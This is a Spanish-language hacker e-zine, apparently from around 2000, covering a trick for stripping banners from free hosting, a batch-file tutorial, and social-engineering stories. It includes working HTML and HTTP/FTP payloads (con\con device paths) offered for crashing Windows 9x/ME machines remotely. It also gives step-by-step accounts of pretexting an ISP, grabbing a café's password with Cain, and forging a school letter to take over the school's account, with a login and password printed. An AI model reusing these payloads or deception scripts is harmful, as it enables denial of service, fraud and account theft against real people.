http://www.genocide2600.com/~spikeman/ Spikeman's Denial Of Service Website
RootShell - http://www.rootshell.com
Slashdot - http://www.slashdot.org
Data - http://www.hideaway.net/data.html

´´´´´´´´´´
Los anteriores sitios son considerados ilegales al explicar tan claramente
hoyos de seguridad y como explotarlos. Estos documentos son llamados "advisories"
y te permiten encontrar hoyos en tu propia PC y arreglarlos. Mientras tu uses
esta informacion para bien, hackear a otros es tu propia eleccion, esta es la
diferencia entre lo legitimo y lo ilegal.
``````````
Despues de entrar a uno de los anteriores sitios de busqueda busca por las
palabras que necesites, el daemon que se esta corriendo en el servidor, la
version. etc. nada mas sencillo que eso.


<=======================================================================>
                       4)- Banners? Hosting Gratuito
<=======================================================================>

Ultimamente hay por montones sitios en Internet q ofrecen hosting gratuito,
pero te habras dado cuenta como llenan de banners y propaganda inutil tu
pagina web, esa vaina del "casino on net" y otras cuantas de las que estoy
hasta el culo, explicare brevemente como podemos librarnos de los banners en
nuestras paginas web... 

1 -
Existen dos nuevas tags aceptadas por el IE5 en adelante que permiten a un
webmaster filtrar cierto codigo, estas son <NOSCRIPT> y <NOFRAMES>, y ahora
nos serviran contra estas compañias de mierda que nos llenan de publicidad
que realmente no alcanzamos a leer, xq es casi un ataque visual lo que vemos,
yo estoy razonablemente de acuerdo en que por el hecho de prestarnos un
servicio gratuito nuestras paginas lleven un banner, pero a el abuso que se
llega a someternos es casi insostenible. Viendo las nuevas etiquetas se me
ocurrio el como librarnos de estas propagandas:

GALEON, IESPANA, GRATISWEB, ETC
Estos sitios de hosting agregan a cada pagina alojada un script que ejecuta
el banner o los frames que se abren al acceder a tu pagina, para librarte de
los banners de un sitio de estos, solo pon la etiqueta <NOSCRIPT> al final
de el archivo HTM pero justo antes de la etiqueta </HTML> que marca el final
de la pagina. Asi mi pagina quedaria:

<HTML>
<HEAD>
<TITLE>
colhackers.8k.com
</TITLE>
</HEAD>
<BODY text=#ffffff bgColor=#000000>
<P align=center><STRONG><FONT size=-1>IbAgUe - COLOMBIA... cAd|</FONT></STRONG></P>
</BODY>
<NOSCRIPT>
</HTML>

Dejando la etiqueta abierta justo antes del final de la pagina todos los
script que el servidor introduzca no se ejecutaran.


FREESERVERS, 20m, 100megas ETC
Existen algunos sitios como freeservers que nos proporcionan un bonito nombre
a la web, x ej http://colhackers.8k.com ;) algo mejor q tener:
http://www.geocities.com/rapesgirls/9876/index.htm
y que tambien proporcionan servicios avanzados como FeedBacks, Tableros de
Mensajes, etc. Para evitar el codigo que genera el frame de sitios como este
mira el siguiente codigo:
------------------------
<HTML>
<NOFRAMES>
<HEAD>
</HEAD>
<BODY>
</NOFRAMES>
<HTML>
<HEAD>
<TITLE>
colhackers.8k.com
</TITLE>
</HEAD>
<BODY text=#a7b5c6 bgColor=#000000>
<P align=center><STRONG><FONT size=-1>IbAgUe - COLOMBIA... cAd|</FONT></STRONG></P>
</BODY>
<NOSCRIPT>
</HTML>
------------------------

El robot de estos sitios justo despues de la etiqueta <BODY> inserta el codigo
de los frames, pero detecta que dentro de la etiqueta <BODY> </BODY> no
exista un </NOSCRIPT> o un </NOFRAMES> por lo que debemos crear el <BODY>
falso que hara que el server inserte su codigo alli pero no detecte el 
</NOFRAMES> que tenemos despues de la etiqueta falsa y no en la verdadera 
<BODY></BODY>. Asi que el codigo necesario seria:

<HTML>
<NOFRAMES>
<HEAD>
</HEAD>
<BODY>
</NOFRAMES>

Asi de simple.... jejeje

Por:cAd|
irc Dalnet #colhackers
c_a_d@hotmail.com

<=======================================================================>
                       5)- Crash win 9x/ME
<=======================================================================>

Primero q todo guarda el siguiente texto como un archivo HTM y abrelo... :D

-------------------------------------------------------------------------
<HTML>
<HEAD>
<TITLE>
</TITLE>
<script language="JavaScript">
function StatusMsg(msge) {
  status=msge;
  document.returnValue = true;
}
</script>
</HEAD>
<BODY onmouseover="StatusMsg('ColHacK');return document.returnValue" text=#ffffff bgColor=#000000>
<P align=center><STRONG><FONT size=-1>ColHackers-cAd|</FONT></STRONG></P>
<A HREF="x:\con\con">Enter Here..</A>
</BODY>
</HTML>
-------------------------------------------------------------------------- 


Este es un error de Io.sys, en Win9x y ME, al intentar acceder a un path como
x:\device\device el computador te devolvera una de las pantallitas azules de
la muerte  (lugubremente clasicas en windows)  y no  habra otra solución que
reiniciar la PC.
no + intenta hacer un carpeta en c: con el nombre de un device... !"··!@#

Algunas formas de usar este exploit remota y localmente:


1- Ejecutando el path x:\device\device donde device puede ser:

  CLOCK$       - Reloj de Sistema
  CON          - Consola; combinacion del teclado y la pantalla para manejar
                 entrada y salida de datos.
  AUX or COM1  - Primer puerto de comunicacion serial.
  COMn         - Segundo, Tercero, ... puerto de comunicacion
  LPT1 or PRN  - Primer puerto paralelo
  NUL          - "null device" lo conocemos todos bajo linux como /dev/null.
  CONFIG$      - Desconocido


2- De forma remota mediante un archivo HTML...

2.1
------------------------------------------------
<HTML>
         <BODY>
           <A HREF="x:\con\con">crashing windowzes</A>
           <!-- o nul\nul, clock$\clock$ -->
           <!-- o aux\aux, config$\config$ -->
         </BODY>
       </HTML>
------------------------------------------------
Al dar click en el Link surgira el problema...

2.2
------------------------------------------------
<HTML>
         <BODY>
           <IMG SRC="x:\con\con">
           <!-- or nul\nul, clock$\clock$ -->
           <!-- or aux\aux, config$\config$ -->
         </BODY>
       </HTML>
------------------------------------------------
Con abrir la pagina es suficiente... solo en Windows 98 y ME se bloqueara
completamente el sistema, en windows 95 solo recibiras un pantallazo azul
y despues de reiniciarse el explorer.exe volveras a la normalidad...

3- Un sistema 9x corriendo un daemon de FTP o HTTP puede tambien ser nokeado
remotamente por ejemplo, intentado acceder a:

www.Win98machine.com/nul/nul
corriendo un daemon de HTTP o:

GET /con/con
corriendo WarFTP Daemon.


cAd|

<=======================================================================>
                       6)- Programacion Batch - *.bat
<=======================================================================>

~Leyendo Colombian Coffee hackers me di cuenta q' habian muchos .bat, pero bueno
ningun articulo sobre como hacerlos y los comandos generales... 
Aunque ya esten algo pasados de moda, aki tienes pa' un rato, x lo menos a mi me han
servido de mucho en varias ocasiones... 

DOS es basicamente un archivo llamado command.com este es el archivo que maneja
todos los comandos que tu escribes como COPY, DEL, DIR etc. estos comandos son
internos (los que van dentro de command.com), tambien existen comandos externos
como DISKCOPY, FORMAT, UNDELETE. etc
Asi que cuando escribes un comando, command.com lo ejecuta (comando interno) o
llama el programa externo y devuelve el resultado.
Los archivos Bat son para el DOS lo que las macros son para Word.
Los bat son basicamente archivos de texto simple conteniendo comandos de DOS,
el mejor editor para un archivo .bat es notepad solo recuerda grabar el archivo
con extension .bat
Cuando abres el archivo, DOS lo ejecuta linea por linea.

*********************
Algo que tienes q tener en cuenta es que el bat no puede tener el nombre de
un comando de DOS. Por ejemplo si creas un archivo .bat llamado dir.bat e
intentas ejecutarlo, nada pasara.
Esto es xq command.com cuando va a atravez de un comando, primero chequea si
es un comando interno. y si no lo es command.com busca un .exe .com o .bat
con ese nombre. Todos los comandos externos tienen una extension .COM o .EXE, DOS no mirara si el programa BATCH existe.
*********************

Ahora vamos por el primer archivo BATCH, simplemente escribe esto a
un archivo de texto y guardalo con extension .bat

cd c:\windows\
telnet

Miremos el codigo, la primera linea le dice a command.com q vaya a 
c:\windows y luego ejecuta el cliente de telnet. Normalmente no necesitamos
cambiar el directorio dado q c:\windows es el directorio predeterminado de
DOS, asi que solo la siguiente linea funcionaria bien.

telnet

Veamos los comandos de los archivos BAT

REM

El comando mas simple es REM (Remark). Sirve para insertar comentarios en el
codigo y hacerlo mas comprensivo, al = q un <!--    --> en HTML.
Este comando ignora cualquier cosa que este delante de el en la misma linea, 
no es mostrado en la pantalla durante la ejecución y es muy util en grandes
cantidades de codigo.
Pongamole un comentario a nuestro primer archivo bat:

REM Este programa ejecuta mi programa favorito; Telnet

telnet

ECHO

El comando ECHO es usado para mostrar algo en la pantalla, puede ser usado
para decirle al usuario que esta haciendo actualmente el arhivo.

ECHO Este archivo borrara todos los archivos temporales de tu sistema.
ECHO Ahora vamos al directorio Temporal
cd c:\windows\temp
ECHO Borrando archivos innecesarios...
del *.tmp
ECHO Tu sistema ahora esta limpio.

Ahora veamos que pasa cuando tu ejecutas ese archivo bat:

C:\WINDOWS>nombre_del_archivo.bat
C:\WINDOWS>ECHO Este archivo borrara todos los archivos temporales de tu sistema.
Este archivo borrara todos los archivos temporales de tu sistema.
C:\WINDOWS>ECHO Ahora vamos al directorio Temporal
Ahora vamos al directorio Temporal
C:\WINDOWS>cd windows\temp
C:\WINDOWS\TEMP>ECHO Borrando archivos innecesarios...
Borrando archivos innecesarios...
C:\WINDOWS>del *.tmp
C:\WINDOWS>ECHO Tu sistema ahora esta limpio.
Tu sistema ahora esta limpio.

El problema es q DOS esta mostrando el comando y tambien su resultado, para
esto se pone al principio del archivo:

ECHO OFF

Al agregar esa linea a nuestro archivo el resultado seria el siguiente:

C:\WINDOWS\Escritorio>ECHO OFF
Este archivo borrara todos los archivos temporales de tu sistema.
Ahora vamos al directorio Temporal
Borrando archivos innecesarios...
Tu sistema ahora esta limpio.

:D muy bien!, pero en cualquier caso el comando inicial ECHO OFF se esta mostrando.
Para que no se vea en pantalla un comando pero q igualmente se ejecute, anteponemos
el signo @, asi q la primera linea de nuestro archivo quedaria @ECHO OFF
Para dejar una linea en blanco lo logico seria escribir algo como ECHO, pero eso no
funciona, debes escribir ECHO seguido de un punto en el archivo "ECHO.", dejar
una linea en blanco en el archivo tampoco funciona.

PAUSE

Digamos q tu creas un archivo bat que muestra los archivos en el directorio,
antes de ejecutar cualquier otra cosa. Tu debes dar tiempo al usuario de reaccionar
antes de realizar cualquier accion, para eso se usa el comando PAUSE:

REM Este programa borrara todos los archivos .doc en el directorio actual
REM Pero da al usuario la posibilidad de reaccionar y detener el proceso
@ECHO OFF
ECHO CUIDADO: Borrar todos los documentos de Word?
ECHO Presione CTRL+C para abortar o cualquier otra tecla para continuar.
PAUSE
DEL *.doc

Cuando lo ejecutas obtienes el siguiente resultado:

C:\WINDOWS>a.bat
CUIDADO: Borrar todos los documentos de Word?
Presione CTRL+C para abortar o cualquier otra tecla para continuar.
Presione cualquier tecla para continuar . . .

^C

Finalizar el trabajo por lotes (S/N)?s

Despues regresaras a la linea de comandos.

PARAMETROS: Dando información a los archivos BAT

Para hacer a los programas realmente inteligentes, necesitas dotarlos de parametros
Para entender lo q realmente es un parametro, mira el siguiente script:

@ECHO OFF
ECHO El Primer Parametro es %1
ECHO El Segundo Parametro es %2
ECHO El tercer Parametro es %3

El script muestra informacion en la pantalla, pero a q se refiere los %x, son
los parametros, guarda el anterior bat y ejecutalo de la siguiente manera:

C:\windows>batfile abc def ghi

El archivo produce el siguiente resultado:

C:\windows>batfile abc def ghi
El Primer Parametro es abc
El Segundo Parametro es def
El tercer Parametro es ghi

La primera linea en la salida es producida por la linea de codigo:

ECHO El Primer Parametro es %1

Basicamente lo que pasa, es q cuando DOS encuentra el simbolo %1, examina el
comando original usado para ejecutar el programa batch y busca la primera palabra(argumento)
despues del nombre del archivo batch, y asigna a %1 el valor de la palabra
En el ejemplo anterior la primera palabra es abc, asi que a %1 se le asigna el
valor de esta palabra.

El simbolo %2 trabaja de la misma forma, la unica diferencia es que en vez de
el primer argumento, DOS asigna el valor del segundo argumento, es decir def y
asi susesivamente.
Estos simbolos %1, %2, %3 etc son llamados parametros remplazables.

Si al ejecutar un archivo, damos mas parametros de los q el archivo batch necesita,
el resto de argumentos seran ignorados por DOS.

Para entender el uso de los parametros, veamos un ejemplo, el siguiente script
requiere q el usuario especifique los archivos a borrar y donde se encuentran ellos
localizados:

@ECHO OFF
CD\
CD %1
DEL %2

El archivo puede ser llamado desde la linea de comandos de la siguiente manera:

batfile windows\temp *.tmp

En un script simple nosotros no podemos usar mas que nueve parametros remplazables.
Un archivo simple no puede tener mas parametros q de %1 a %9, el parametro %0
contiene el nombre del bat.

************
Digamos que tu deseas parar la ejecucion del archivo y regresar a WINDOWS,
el comando EXIT es utilizado en esas situaciones. Simplemente termina el
archivo con el comando EXIT. Automaticamente cerrara la ventana de DOS y 
regresara a Windows.
************

SHIFT: Parametros infinitos

Algunas veces puede que el programa necesite usar mas que nueve parametros
al mismo tiempo. Para ver como funciona el comando SHIFT mira el siguiente bat:

@ECHO OFF
ECHO El primer parametro es %1
ECHO.
SHIFT
ECHO El Segundo Parametro es %1
ECHO.
SHIFT
ECHO El Segundo Parametro es %1

ahora ejecuta el archivo en DOS y mira los que pasa.

batfile abc def ghi

El Primer parametro es abc

El segundo parametro es def

El segundo parametro es ghi

Como funciona? Cada comando SHIFT dado, hace q los parametros bajen una posicion.
Esto significa que el primer SHIFT, convierte a %1 en def, convierte a 2% en ghi
y abc es completamente eliminado por DOS. Todos los parametros cambian y se mueven
una posicion abajo.

FOR LOOP

Su uso es:

FOR %%PARAMETER IN(set) DO comando

Miremos el siguiente ej:

@ECHO OFF
CLS
FOR %%A  IN (abc, def, xyz) DO  ECHO  %%A

Basicamente FOR declara una variable (%%A) y le asigna diferentes valores
dados en el set (abc, def, xyz) y cada vez que a la variable se le asigna un
nuevo valor, se ejecuta un comando (ECHO %%A)

%%A es la variable a la cual se asignan los valores, puedes usar cualquier
caracter despues de los dos signos % exceptuando del 0 al 9.

El IN(abc, def, xyz) es la lista a travez de la cual el comando FOR busca.
A la variable %%A se le asignan los valores entre los parentesis, pueden ser
separados x comas, o espacios.

Para cada item en el set el comando FOR ejecuta un comando que va despues de
DO, en este ejemplo se ejecuta ECHO %%A.

Ejecutando el archivo anterior obtenemos:

abc
def
xyz

El comando FOR es muy poderoso si es usado con parametros remplazables, el
siguiente archiv x ej:

@ECHO OFF
ECHO.
ECHO Borrando los sigts archivos:
ECHO %1 %2  
ECHO.
ECHO Presione Ctrl+C para abortar el proceso.
PAUSE
FOR %%a IN (%1 %2 ) DO DEL %%a
ECHO Archivos Eliminados. Mision Completa

Al momento de la ejecucion, el proceso seria algo como:

C:\WINDOWS>batfile  *.tmp *.bak

Borrando los sigts archivos:
*.tmp *.bak

Presione Ctrl+C para abortar el proceso.
Presione cualquier tecla para continuar. . .

Archivos Eliminados. Mision Completa
----------------------------------

IF: Condicional
El comando IF nos permite hacer a los bat mas utiles e inteligentes. Usando
este comando el programa puede chequear parametros y de acuerdo al resultado
ejecutar determinada tarea. No solamente puede chequear parametros, puedes
tambien x ej ver si un archivo existe en alguna ubicacion o no.

Chequeando si un archivo existe o no

El sintaxis general para chequear la existencia de un archivo es el sgte:

IF [NOT] EXIST nombredearchivo Comando

Sera mas claro con el sgte ej:
IF EXIST c:\autoexec.bat ECHO Si q Existe
Este comando mira si el archivo c:\autoexec.bat existe o no. Si existe ejecuta
el comando y si no simplemente no hace nada.

En el ejemplo anterior si el archivo autoexec.bat no existe el programa no
hace nada, tambien podemos hacer que ejecute una accion si la condicion es
falsa usando el comando GOTO. Observa el siguiente ejemplo para que quede un
poco mas claro:

@echo off
IF EXIST C:\colhackers.txt GOTO HKCK
Goto end
:HKCK
ECHO colhackers.txt existe
:end

El comando IF en este codigo mira si el archivo c:\colhackers.txt existe, si
la condicion es cierta salta a :HKCK y si no salta a :End
:HKCK y :END en el ejemplo anterior son llamados Etiquetas.

******************
Tambien podemos chequear por mas de una archivo al mismo tiempo de la sigt
forma:
IF EXIST c:\autoexec.bat IF EXIST c:\autoexec.bak ECHO Ambos Existen
******************
Podemos chequear si un archivo NO existe de la misma forma, el 
sintaxis basico seria:
IF NOT EXIST nombredearchivo comando

Por ej,

IF NOT EXIST c:\colhackers.txt ECHO Este no existe

****************
Para comprobar la existencia de directorios debes usar el device NUL, ya que
algo como, IF EXIST c:\windows ECHO Existe, no funcionara, asi que el comando
seria algo como:
IF EXIST c:\windows\nul ECHO Existe
****************

Comparando variables para Validar Parametros

El sintaxis basico es:

IF [NOT] cadena1==cadena2 comando 

Vamos a hacer un script que ejecute una tarea de acuerdo a el parametro
especificado por el usuario:

@ECHO off
IF %1==cp GOTO COPY
GOTO DEL
:COPY
Copy %2  a:
GOTO :END
:DEL
Del %2
:END

Este ejemplo es muy claro. EL comando IF compara el primer parametro con cp,
si coincide salta a la etiqueta COPY y si no salta a DEL

Podemos editar el ej anterior para hacer que DOS chequee si el parametro fue
dado por el usuario o no y si no que devuelva un mensaje de error solo agregando
las sgts lineas al principio del archivo anterior:

@ECHO OFF
IF "%1" == "" ECHO Aqui iria el mensaje de error

Si no hay ningun parametro el archivo muestra un mensaje de error.
Similarmente podemos tambien chequear la existencia del segundo parametro.

EL Comando CHOICE

Antes de aprender a hacer uso de este comando, necesitamos entender q son los
niveles de error. Los niveles de error son generados por los programas para
informar sobre la forma en que fue terminado o fue forzado a terminar el programa.
Por ejemplo cuando nosotros terminamos un programa presionando Ctrl+C el codigo
de error es 3 y si se cierra normalmente es 0. Estos numeros por ellos mismos
no sirven de nada, pero siendo usados con el IF ERROR LEVEL y el comando 
CHOICE, son realmente muy utiles.

El comando CHOICE toma una letra del teclado y devuelve un codigo de error
evaluado cuando la tecla es presionada. El sintaxis general del comando es:

CHOICE[cadena][/C:keys][/S][/N][/T:key,secs]

La cadena no es mas que la frase a mostrar cuando el comando este corriendo.

/C:keys define las posibles teclas a ser presionadas. Si no hay opciones
especificadas seran usadas las teclas predeterminadas S/N, por ej:
   
CHOICE /C:A1T0

Define A, 1, T y O como las posibles teclas. Durante la ejecucion si el
usuario presiona una tecla no definida, escuchara un beep de error y el
programa continuara como fue codificado.


La opcion /S hace que las teclas definidas por CHOICE /c sean sensitivas a
MAyusculas y Minusculas, es decir que no sera lo mismo escribir C q c.

La opcion /N, si esta presente muestra las teclas definidas por /C entre
parentesis y si no solo muestra la cadena.

/T:key,secs define la tecla por la que se ira el programa despues de un
determinado tiempo sin que el usuario haya tomado parte, Por Ejemplo:

CHOICE Seleccione un Explorador: /C:NI /T:I.5

El anterior comando muestra Seleccione un Explorador[N,I] y si no hay teclas
presionadas en los proximos 5 segundos, el programa selecciona I.

Ahora combinemos realmente el comando CHOICE con el comando IF ERROR LEVEL,
necesitaras que niveles de error devuelve el comando.

El comando CHOICE esta diseñado para devolver un nivel de error de acuerdo
a la tecla presionada y a su posicion en la opcion /C. Para entender esto
mejor mira el sgte ej:


CHOICE /C:AN12

Ahora recuerda q el nivel de error se evalua dependiendo de la tecla presionada
Esto significa q si la tecla A es presionada, el nivel de error seria 1, si
es presionada la N, el nivel de error seria 2, si es presionado el 1, el
nivel de error seria 3 y si es presionado el 2, el nivel de error seria 4.

Ahora vamos a ver como funciona el comando IF ERROR LEVEL la sintaxis general
seria:

IF [NOT] ERRORLEVEL numero comando

Este codigo evalua el nivel de error actual y si la condición es verdadera
el comando es ejecutado, por ejemplo:

IF ERRORLEVEL 3 ECHO Si

El anterior codigo imprime en pantalla "Si" solo si el nivel de error actual
es 3.
Lo importante a tener en cuenta n este codigo es que la evaluacion de un nivel
de error es verdadera cuando el nivel de erros es igual o mayor que el numero
comparado.

Por ejemplo en el siguiente codigo:

IF ERRORLEVEL 2 ECHO Si

La condicion es verdadera si el nivel de error es > o = 2.

Ahora que sabes como usar el comando CHOICE y el IF ERROR LEVEL facilmente
puedes hacer programas basados en menus. El siguiente es un ejemplo de un
archivo bat que le pregunta al usuario que Explorador de Internet ejecutar:

@ECHO OFF
ECHO.
ECHO.
ECHO Bienvenido al programa de Seleccion de Explorador
ECHO.
ECHO 1. Internet Explorer 5.5 
ECHO 2. Mozilla 5
ECHO x. Salir del Programa de Seleccion de Explorador
ECHO.
CHOICE "Selecciona el Explorador o presiona x para salir" /C:12x /N
IF ERRORLEVEL 3 GOTO END
IF ERRORLEVEL 2 START C:\progra~1\Netscape
IF ERRORLEVEL 1 start c:\progra~1\intern~1\iexplore.exe
:END

NOTE: Observa el orden en que damos los IF ERROR LEVEL

Redireccion

Normalmente la salida es enviada a la pantalla (STDOUT), la salida standard
de los comandos, desde el Teclado (STDIN) pero tu puedes redirigir la salida
y entrada de datos a alguna otra cosa que los estandar I/O devices.

Para enviar la salida de un comando a otro lado que no sea la pantalla se utiliza
el operador de redireccion > que es mas comumente usado para capturar el resultado
de un comando en un archivo de texto.
Digamos que deseas tener la lista de todos los archivos que tienes en un directorio
para esto puedes usar el operador de redireccion de la siguiente forma:

dir /B /O > c:\windows\escrit~1\list.txt

Este comando ejecutara el comando dir y guardara el resultado en el archivo
de texto especificado, si el archivo no existe es creado y si existe es
remplazado por el resultado del comando.

Digamos que tu deseas guardar el resultado de varios comandos en un archivo
de texto sin que al guardar un nuevo resultado se borre el contenido del 
archivo, para esto se usa el operador >>

Por Ejemplo, 

dir >> xyz.txt

El anterior comando hace una lista del directorio actual y guarda el resultado
en xyz.txt sin borrar lo que hay dentro de este archivo.

DOS no solamente permite la redireccion a Archivos, tambien a varios Devices
que ya he mostrado antes en Crash de Windows 9x/ME.


Nombre Usado                            DEVICE

AUX                                     Auxiliary Device (COM1)
CLOCK$                                  Real Time Clock
COMn                                    Serial Port(COM1, COM2, COM3, COM4)
CON                                     Console(Keyboard, Screen)
LPTn                                    Parallel Port(LPT1, LPT2, LPT3)
NUL                                     NUL Device(means Nothing)
PRN                                     Printer

Digamos por ejemplo, que deseas imprimir la lista de un directorio, simplemente
con el sgte comando:

dir *.* > prn

El NUL device (nada) es un poco dificil de entender y requiere una mencion
especial aqui. La redireccion al Device NUL practicamente no tiene uso pero
puede ser usada para suprimir la respuesta que devolveria un comando.
Por ej, cuando DOS copia un archivo, devuelve el mensaje:
1 archivo(s) copiado(s), si deseas q no aparezca este mensaje en pantalla
puedes hacer uso de este device:

c:\windows>copy archivo.txt > NUL

Redirigira el mensaje de salida al device NUL haciendo que no sea visto
en pantalla.

Redirigiendo la entrada (Input)

Asi como se redirige la salida de datos podemos rediriir la entrada, manejada
por el operador de redireccion de entrada < mas comunmente usado para mostrar
el contenido de un archivo en pantalla usando el comando MORE o TYPE aunque
claramente el comando TYPE mostrara un archivo a toda velocidad mientras que
MORE te dara tiempo de leerlo por partes.

more < xyz.txt

Este comando enviara el contenido del archivo al comando MORE que lo mostrara
pagina por pagina en la pantalla:

......MORE......

Tu puedes tambien enviar teclas a cualquier comando de DOS que espere confirmacion
por parte del usuario o intervencion por parte del mismo para ejecutar una
tarea.
Por ejemplo un tipico comando Format necesita 4 entradas, primero un Enter
que de el comando, 2º un ENTER confirmando que hay un disco y finalmente la
respuesta de si se quiere formatear otro disco.

Asi que basicamente hay tres entradas por parte del usuario
ENTER, N y ENTER, asi que puedes incluirlos en un archivo bat y escribir el
comando format de la siguiente manera:

c:\windows>format a: < xyz.bat


El archivo xyz.bat seria algo como
***********

N

***********
Notese los Enter, antes y despues de la N


Entubando

Es una herramienta que combina la redireccion de entrada y salida de datos.
Usa el simbolo |. Este comando captura la salida de un comando y la envia a
la entrada de otro, por ej, cuando damos el comando del *.* el usuario debe
confirmar presionando s, podemos hacer lo mismo sin niguna interaccion por
parte del usuario ejecutando:

echo s | del *.* 

Bueno, este comando es muy claro, s es enviado al comando del *.*

La Programación en Bat puede ser muy facil y util.
La unica cosa que necesitamos para experimentar con la programacion en BAtch
es un conocimiento de los comandos de DOS. Yo sugiero conseguir un libro sobre
comandos de DOS en la WEB o algo parecido.

cAd|
c_A_d@hotmail.com


<=======================================================================>
                       7)- Un poco de Ingenieria Social
<=======================================================================>

La ingenieria social es engañar a alguien, haciendose pasar x otra persona, o convenciendola
para conseguir un pasw o algo en nuestro beneficio, x ej: hacerse pasar por una niña
desesperada en un salon de chat, a la q le cortan el servicio de internet o algo parecido
y convencer a alguien lo suficientemente tonto como para q te d su pasw. etc
Te voy a dar algunos usos + claros en colombia...

Rolando en un viaje de colegio en bogota, mas exactamente la Feria del Libro, me
escape un rato y me tope con un Cafe Internet algo pequeño, pague una hora y saque
el pasw de acceso del cafe con el Cain, el ISP era multiphone yo tenia su nombre de
usuario y pasw pero tenia que conseguir el # de acceso a internet de multiphone en 
mi ciudad ue? ademas de los #s DNS y otros cuantos dependiendo, lo + sencillo, 
busque en el directorio el Tel de Multiphone y aki es el punto, convencer al del otro
lado de la linea que soy usuario de multiphone y necesito los datos de acceso en mi
ciudad .. tarea muy facil x lo menos las veces q lo hize...

>Multiphone buenos dias, en que puedo ayudarle?
Hola buenos dias, eh.. pasa q tengo una cuenta de internet en bogota con multiphone,
pero ahora me encuentro de viaje y necesitaria entrar a internet desde aqui, no se
como puedo conectarme?
>un momento por favor   (ahora minimo te pasan a algun tecnico o algo asi)
>Si, buenos dias, en q ciudad tiene su cuenta de internet?
Bogota
>pero q # utiliza normalmente para conectarse? 
(uy, pues nada, somos muy inexpertos en el tema)
Eh.. realmente no lo se, a mi casa fue un tecnico e instalo todo. 
(si el man no es alguien desconfiado te dara de una los datos)
>cual es su nombre de usuario?
(nos salio caspa este man, si no lo tienes puedes inventarte uno, nisiquiera lo confirmara)
Harigar, con h al principio
>debe marcar el 947947**** 
(el cabron no nos da las DNS, si quieres puedes volver a marcar diciendo que no pudiste entrar
al rato)
Pero no necesito nada mas? en bogota necesitaba poner otros numeros
>Bueno, las DNSs son 200.21.46.5 y 200.21.46.6, debe dar click derecho a la conexion, etc etc
Muchas gracias.... :D

Bueno asi de simple termina siendo todo.. a ver otro caso un poco + delicado...

En mi colegio pagan una conexion a Internet mensual, pero realmente nunca la usan
y era justo q yo q no tenia $$$ para pagar una mensualidad la aprovechara para algo no?
pero para sacar el pasw como carajos le hacia?
Toco arriesgarme un poco esta vez..
Saque un poco de informacion sobre la cuenta q tenia el Colegio, sabia que su email
era apcomfe@tolinet.com.co, logicamente su servidor de correo era tolinet.com.co
asi que saque mi telnet, me conecte a tolinet.com.co, puerto 25 e hize un VRFY apcomfe
y el servidor me respondio con:

250 -890703578-asofamilia col. comfenalco <apcomfe@bunde.tolinet.com.co> 


Tome una hoja con el sello del colegio las que utilizan para enviar cartas y demas cosas e
imprimi en ella algo parecido a esto:



Ibague, 9 de Octubre de 1985


Se¤ores Tolinet: 

Solicitamos a uds lo mas pronto posible el cambio de nuestro login y pasw
dado a la perdida del mismo x los datos que anexaremos a continuación,

login:apcomfe
pasw:bibliocomf

Gracias por la Atencion Prestada.






Asofamilia
Colegio Comfenalco


Y un sello que iba sobre una firma que acaba de inventar casi inintengible
Todo listo, enviarla a la oficina de Tolinet y esperar...
y justo como lo esperaba, esa misma noche el pasw era mio y durante seis
largos meses, jejeje

bueno, pues estos son solo dos ejemplos de ingenieria social... que te pueden
ayudar a entender un poco como va esto...

cAd|
#colhackers Irc-Dalnet

<=======================================================================>
                                  8)- Despedida
<=======================================================================>
Y llegamos al final de la primera edicion de colhackers...
Mis parpados cansados no quieren cerrarse, pero veo q hay un fin
esta es nuestra despedida, espero y haya servido para algo...
Con la suerte de estar vivos, melancolicos y agonicos:::::::::::::::::::::
-Colhackers-

"Salimos de la nada y ahora estamos en la miseria..."
Triste Frase que encontre en una calle de Cuba
cAd|